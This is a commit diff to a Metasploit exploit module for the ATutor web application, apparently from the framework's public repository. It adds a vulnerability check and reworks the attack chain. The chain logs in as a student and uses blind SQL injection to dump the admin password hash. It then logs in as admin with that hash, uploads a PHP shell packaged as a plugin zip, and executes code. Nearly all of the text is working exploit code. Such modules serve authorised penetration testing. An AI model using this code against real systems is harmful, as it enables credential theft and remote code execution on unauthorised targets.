Merge new code changes from mr_me

modules/exploits/multi/http/atutor_sqli.rb

@@ -63,6 +63,22 @@ class Metasploit3 < Msf::Exploit::Remote
     super("#{peer} - #{msg}")
   end
 
+  def check
+    # the only way to test if the target is vuln
+    begin
+      test_cookie = login(datastore['USERNAME'], datastore['PASSWORD'], false)
+    rescue Msf::Exploit::Failed => e
+      vprint_error(e.message)
+      return Exploit::CheckCode::Unknown
+    end
+
+    if test_injection(test_cookie)
+      return Exploit::CheckCode::Vulnerable
+    else
+      return Exploit::CheckCode::Safe
+    end
+  end
+
   def push
     uri = normalize_uri(target_uri.path)
 
@@ -115,7 +131,7 @@ class Metasploit3 < Msf::Exploit::Remote
   def upload_shell(cookie)
     post_data = Rex::MIME::Message.new
     post_data.add_part(create_zip_file, 'archive/zip', nil, "form-data; name=\"modulefile\"; filename=\"#{@plugin_name}.zip\"")
-    post_data.add_part('Install', nil, nil, "form-data; name=\"install_upload\"")
+    post_data.add_part("#{Rex::Text.rand_text_alpha_upper(4)}", nil, nil, "form-data; name=\"install_upload\"")
     data = post_data.to_s
     res = send_request_cgi({
       'uri' => normalize_uri(target_uri.path, "mods", "_core", "modules", "install_modules.php"),
@@ -145,7 +161,7 @@ class Metasploit3 < Msf::Exploit::Remote
     end
 
     # auth failed if we land here, bail
-    fail_with(Failure::NoAccess, "Upload did not work")
+    fail_with(Failure::Unknown, "Unable to upload php code")
     return false
   end
 
@@ -275,19 +291,19 @@ class Metasploit3 < Msf::Exploit::Remote
 
   def generate_sql_and_test(do_true=false, do_test=false, sql=nil, cookie)
     if do_test
-       if do_true
-          result = perform_request("1=1", cookie)
-          if result =~ /There are \d entries./
-             return true
-          end
-       else not do_true
-          result = perform_request("1=2", cookie)
-          if not result =~ /There are \d entries./
-             return true
-          end
-       end
-    else not do_test and sql
-       return get_ascii_value(sql, cookie)
+      if do_true
+        result = perform_request("1=1", cookie)
+        if result =~ /There are \d entries./
+          return true
+        end
+      else not do_true
+        result = perform_request("1=2", cookie)
+        if not result =~ /There are \d entries./
+          return true
+        end
+      end
+    elsif not do_test and sql
+      return get_ascii_value(sql, cookie)
     end
   end
 
@@ -332,18 +348,18 @@ class Metasploit3 < Msf::Exploit::Remote
     print_status("Logged in as #{datastore['USERNAME']}, sending a few test injections...")
     report_cred(user: datastore['USERNAME'], password: datastore['PASSWORD'])
 
-    if test_injection(student_cookie)
-      print_good("Test injection working!")
-      print_status("Dumping username and password hash...")
-      credz = dump_the_hash(student_cookie)
-      print_good("Got the #{credz[0]} hash: #{credz[1]} !")
-      if credz
-        admin_cookie = login(credz[0], credz[1], true)
-        print_status("Logged in as #{credz[0]}, uploading shell...")
-        if upload_shell(admin_cookie)
-          print_good("Shell upload successful!")
-          exec_code
-        end
+    print_status("Dumping username and password hash...")
+    # we got admin hash now
+    credz = dump_the_hash(student_cookie)
+    print_good("Got the #{credz[0]} hash: #{credz[1]} !")
+    if credz
+      admin_cookie = login(credz[0], credz[1], true)
+      print_status("Logged in as #{credz[0]}, uploading shell...")
+      # install a plugin
+      if upload_shell(admin_cookie)
+        print_good("Shell upload successful!")
+        # boom
+        exec_code
       end
     end
   end